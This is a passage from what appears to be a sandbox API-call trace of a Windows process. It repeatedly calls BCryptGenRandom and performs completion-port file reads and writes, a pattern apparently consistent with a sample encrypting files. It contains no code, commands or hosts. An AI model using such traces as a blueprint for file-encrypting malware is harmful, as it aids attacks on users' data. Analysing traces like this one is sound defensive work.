lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0146.177] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1ed0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.177] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0146.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0146.186] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0146.187] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.187] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.187] free (_Block=0x3e305b8) [0146.187] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.187] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.187] free (_Block=0x1fa91d0) [0146.187] free (_Block=0x1fa2ed8) [0146.188] free (_Block=0x1fa90b8) [0146.188] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.188] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0146.202] CloseHandle (hObject=0x3cc) returned 1 [0146.202] free (_Block=0x3d70450) [0146.202] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0146.215] CloseHandle (hObject=0x2a4) returned 1 [0146.215] free (_Block=0x3e70008) [0146.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0146.230] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0146.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.004] CloseHandle (hObject=0xec) returned 1 [0147.004] free (_Block=0x3d70450) [0147.004] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.007] CloseHandle (hObject=0x3cc) returned 1 [0147.008] free (_Block=0x3df0008) [0147.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.016] CloseHandle (hObject=0x2a8) returned 1 [0147.017] free (_Block=0x3e70008) [0147.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.021] CloseHandle (hObject=0x170) returned 1 [0147.022] free (_Block=0x3ef0008) [0147.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.043] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4630, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.043] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.052] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x72de, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.056] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.057] CloseHandle (hObject=0x2a8) returned 1 [0147.058] free (_Block=0x3df0008) [0147.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.058] CloseHandle (hObject=0x170) returned 1 [0147.058] free (_Block=0x3d70450) [0147.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0147.144] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.145] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0147.145] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.145] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.145] free (_Block=0x3e305b8) [0147.145] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.145] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.146] free (_Block=0x1fa91d0) [0147.146] free (_Block=0x1fa2ed8) [0147.146] free (_Block=0x1fa90b8) [0147.146] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.146] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.173] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0147.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0147.175] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.175] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.175] free (_Block=0x3e305b8) [0147.175] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.175] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.175] free (_Block=0x1fa91d0) [0147.175] free (_Block=0x1fa2ed8) [0147.175] free (_Block=0x1fa90b8) [0147.175] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.187] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0147.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0147.188] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.188] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.188] free (_Block=0x3e305b8) [0147.188] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.189] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.189] free (_Block=0x1fa91d0) [0147.189] free (_Block=0x1fa2ed8) [0147.189] free (_Block=0x1fa90b8) [0147.189] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.197] CloseHandle (hObject=0x170) returned 1 [0147.197] free (_Block=0x3df0008) [0147.198] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.205] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1d18, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0147.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.248] CloseHandle (hObject=0x170) returned 1 [0147.248] free (_Block=0x3df0008) [0147.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.255] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0147.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0147.257] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.257] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.257] free (_Block=0x3e305b8) [0147.257] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.257] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.257] free (_Block=0x1fa91d0) [0147.257] free (_Block=0x1fa2ed8) [0147.257] free (_Block=0x1fa90b8) [0147.257] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.258] CloseHandle (hObject=0x2a8) returned 1 [0147.259] free (_Block=0x1ff1e60) [0147.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.260] CloseHandle (hObject=0x2a4) returned 1 [0147.260] free (_Block=0x3d70450) [0147.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.260] CloseHandle (hObject=0x3cc) returned 1 [0147.260] free (_Block=0x3e70008) [0147.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.343] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0147.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.343] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0147.344] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.344] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.344] free (_Block=0x3e305b8) [0147.344] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.344] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.344] free (_Block=0x1fa91d0) [0147.344] free (_Block=0x1fa2ed8) [0147.344] free (_Block=0x1fa90b8) [0147.344] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.345] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0147.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0147.359] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.359] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.359] free (_Block=0x3e305b8) [0147.359] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.359] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.359] free (_Block=0x1fa91d0) [0147.359] free (_Block=0x1fa2ed8) [0147.359] free (_Block=0x1fa90b8) [0147.359] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.360] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0147.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0147.463] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.463] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0147.463] free (_Block=0x3e305b8) [0147.463] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0147.463] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0147.464] free (_Block=0x1fa9400) [0147.464] free (_Block=0x77d7a8) [0147.464] free (_Block=0x1fa92e8) [0147.464] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.466] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xb580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0147.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.565] CloseHandle (hObject=0x338) returned 1 [0147.565] free (_Block=0x3df0008) [0147.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.574] CloseHandle (hObject=0x170) returned 1 [0147.574] free (_Block=0x1ff1e60) [0147.574] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0147.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0147.588] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.588] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.588] free (_Block=0x3e305b8) [0147.588] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.588] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.588] free (_Block=0x1fa91d0) [0147.588] free (_Block=0x1fa2ed8) [0147.588] free (_Block=0x1fa90b8) [0147.588] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.602] WriteFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x7d70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0147.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.617] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5f48, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.632] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0147.644] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1e8e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0147.648] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.283] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0149.283] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0149.289] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0149.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, 